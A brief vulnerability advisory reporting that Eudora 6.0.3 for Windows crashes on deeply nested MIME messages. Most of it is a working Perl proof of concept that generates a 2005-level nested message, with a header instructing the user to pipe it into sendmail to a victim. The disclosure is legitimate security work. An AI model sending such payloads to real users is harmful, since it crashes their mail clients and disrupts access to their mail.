Eudora 6.0.3 for Windows will crash if sent a MIME message nested more than
2000 levels deep. Due to the presence of the [EudoraDir]\spool\*.RCV file,
users may find it difficult to recover from this DoS situation. Demo below.
Cheers,
Paul Szabo - [email protected] http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia
#!/usr/bin/perl –
print "From: me\n";
print "To: you\n";
print "Subject: nested multipart test\n";
print "Mime-Version: 1.0\n";
print "X-Use: Pipe the output of this script into: sendmail -i victim\n";
&nest(0);
print "\n";
sub nest {
my ($x) = @_;
my $b = sprintf("bndry%04d",$x);
print "Content-Type: multipart/mixed; boundary=\"$b\"\n\n";
print "–$b\n";
print "Content-Type: text/plain\n\n";
print "Level $x\n\n";
if ($x < 2005) {
print "–$b\n";
&nest($x+1);
}
print "–$b\n";
print "Content-Type: text/plain\n\n";
print "Final $x\n";
print "–$b–\n\n";
}